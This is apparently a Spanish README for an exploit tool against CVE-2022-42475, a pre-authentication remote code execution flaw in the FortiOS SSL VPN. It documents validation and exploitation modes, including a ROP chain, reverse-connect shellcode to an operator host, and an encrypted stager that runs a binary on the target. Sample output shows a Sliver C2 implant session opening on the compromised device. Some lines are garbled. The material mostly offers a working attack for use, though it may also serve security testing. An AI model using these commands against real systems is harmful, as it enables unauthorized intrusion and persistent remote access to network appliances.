
Exploit para CVE-2022-42475, un RCE sin autenticación en FortiOS SSL VPN. Admite validación, verificación benigna y explotación completa con shellcode de conexión inversa y stager binario cifrado para acceso remoto.
Este es el exploit para la entrada del blog aquí: https://bishopfox.com/blog/exploit-cve-2022-42475
Esta versión del exploit no funcionará sin que tú, el hacker, proporciones las direcciones de memoria necesarias para los gadgets ROP, etc. El trabajo para determinar estos datos es confidencial y propiedad de Bishop Fox y no publicaré (no puedo) publicarlo junto con este exploit. ¡Confío en que lo entiendes!
execve(binary_file).Nota: Actualmente el modo 'solo validación' funciona en todas las versiones conocidas de FortiOS. Sin embargo, los exploits funcionan solo contra FortiOS 6.0.4 en hardware 100D. Ya no trabajo en BF y por lo tanto no puedo publicar el exploit expandido que soporta algo así como 18k objetivos.
pip3 install PyCrypto
pip3 install pycryptodome
Esto no intentará explotar el error, sino que lo desencadena como un fallo (el daemon SSL VPN remoto se reinicia automática e inmediatamente). El fallo se detecta heurísticamente y se informa al operador.
Ejecútalo usando la bandera -v de validación:
$ ./x.py -t 192.168.0.10 -p 8443 -v
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Running in validate-only mode. No RCE.
[>] Testing to see if target is vulnerable (may take 10 seconds)
[+] Target '192.168.0.10:8443' appears to be VULNERABLE
Esto desencadenará el error, desplegará una cadena ROP y saltará al shellcode. El shellcode es benigno y funciona de la siguiente manera:
0xbf/tmp/x en el equipo FortiGate0xbf al exploit si el descifrado del payload fue exitosoBanderas:
-t target host/IP
-p target port
-e exploit mode
-c connect-back only mode
-H and -P operator's IP:port (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
Un ejemplo donde seleccionamos tanto la versión de software 6.0.4 como el modelo de equipo 100D:
┌──(kali㉿kali)-[/mnt/hgfs/fortios/CVE-2022-42475]
└─$ sudo ./x.py -t 192.168.0.10 -p 8443 -e -c -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D 130 ⨯
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Generating random 128-bit AES key to encrypt payload
[+] Encrypting payload...
[+] Using cached shellcode. Edit ./x.py (look for 'shellcode.s') to force refresh.
[+] Configured for connect-back to 192.168.0.99:443
[+] Starting encrypted payload listener...
[+] Preparing for exploit...
[+] Sending request!
[+] Importing gadgets from 'exploit_data.json'
[<] Listener bound to port 443, waiting for connect-back...
[+] Validating gadgets...
[!] No functional hardware models were defined for FortiOS '5.2.14'. Removed.
[!] No functional hardware models were defined for FortiOS '5.6.9'. Removed.
[+] Imported 797 targets:
[-] 6.0.4 [ 1 targets ] <=== 100D
[-] 5.2.14 [ 47 targets ]
[-] 5.6.9 [ 60 targets ]
[-] 6.0.13 [ 68 targets ]
[-] 6.0.14 [ 67 targets ]
[-] 6.0.15 [ 58 targets ]
[-] 6.0.8 [ 67 targets ]
[-] 6.2.11 [ 69 targets ]
[-] 6.2.7 [ 75 targets ]
[-] 6.4.10 [ 71 targets ]
[-] 6.4.2 [ 62 targets ]
[-] 6.4.3 [ 61 targets ]
[-] 6.4.6 [ 73 targets ]
[-] 6.4.9 [ 72 targets ]
[-] 7.0.4 [ 53 targets ]
[+] Starting exploit
[<] Incoming request from 192.168.0.10:22470
[<] Received hello packet from target!! Model #: 100D
[<] Sending encrypted payload of 36 bytes
[<] Finished sending payload (36 bytes), waiting for response...
[<] Received the expected response ('100D') from 192.168.0.10
[<] Target is VULNERABLE with 100% confidence.
[+] All done!
Si omites la opción -m para elegir un modelo de hardware, el exploit probará por fuerza bruta todos los objetivos de hardware para la versión de software especificada.
0xbf/tmp/x0xbf al exploitexecve("/tmp/x")Banderas:
-t target host/IP
-p target port
-e exploit mode
-f filename /path/to/binary/to/execve/on/target
-H and -P operator's IP:port for connect-back (required)
-s software version of FortiOS (required)
-m hardware model running FortiOS
-d turn on debugging
Sliver:
carl@pluto:~$ ./sliver-server_linux
.------..------..------..------..------..------.
|S.--. ||L.--. ||I.--. ||V.--. ||E.--. ||R.--. |
| :/\: || :/\: || (\/) || :(): || (\/) || :(): |
| :\/: || (__) || :\/: || ()() || :\/: || ()() |
| '--'S|| '--'L|| '--'I|| '--'V|| '--'E|| '--'R|
`------'`------'`------'`------'`------'`------'
All hackers gain living weapon
[*] Server v1.5.34 - d2a6fa8cd6cc029818dd8d9e4a039bdea8071ca2
[*] Welcome to the sliver shell, please type 'help' for options
[server] sliver > mtls -l 8888
[*] Starting mTLS listener ...
[*] Successfully started job #1
Exploit:
$ ./x.py -t 192.168.0.10 -p 8443 -e -f implant5 -H 192.168.0.99 -P 443 -s 6.0.4 -m 100D
--[ CVE-2022-42475: FortiGate Remote Pre-auth RCE ]--
--[ Bishop Fox Cosmos Team X ]--
[+] Exploit will attempt to execve("implant5") on the target
...
[<] Target is VULNERABLE with 100% confidence.
[+] All done.
Y de vuelta en Sliver:
[*] Session d8d5344b implant5 - 192.168.0.10:3500 (Burnet) - linux/amd64 - Mon, 06 Mar 2023 22:18:30 MST
[server] sliver > use d8d5344b-c666-4c60-9e33-5ce50eb82cad
[*] Active session implant5 (d8d5344b-c666-4c60-9e33-5ce50eb82cad)
[server] sliver (implant5) > whoami
Logon ID: <err>
[server] sliver (implant5) > ls